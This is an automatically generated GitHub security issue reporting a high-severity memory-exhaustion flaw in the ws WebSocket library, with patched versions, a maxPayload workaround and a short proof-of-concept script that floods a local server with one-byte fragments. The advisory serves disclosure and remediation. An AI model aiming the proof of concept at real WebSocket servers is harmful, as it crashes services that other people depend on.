Skip to content

[HIGH] CVE-2026-48779: Package: ws Installed Version: 8.20.1 Vulnerability CVE-2026-48779 Severity: ... #128

Description

@github-actions

🟠 High Security Finding

Scanner: Trivy
Rule: CVE-2026-48779
Severity: HIGH
File: pnpm-lock.yaml:1

Description

Package: ws
Installed Version: 8.20.1
Vulnerability CVE-2026-48779
Severity: HIGH
Fixed Version: 5.2.5, 6.2.4, 7.5.11, 8.21.0
Link: CVE-2026-48779

Remediation Guidance

Vulnerability CVE-2026-48779
Severity: HIGH
Package: ws
Fixed Version: 5.2.5, 6.2.4, 7.5.11, 8.21.0
Link: CVE-2026-48779

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

References


This issue was automatically created by repo-sentinel. Assigned to Copilot for an automated fix attempt.

Metadata

Metadata

Assignees

No one assigned

    Labels

    securitySecurity vulnerability finding

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions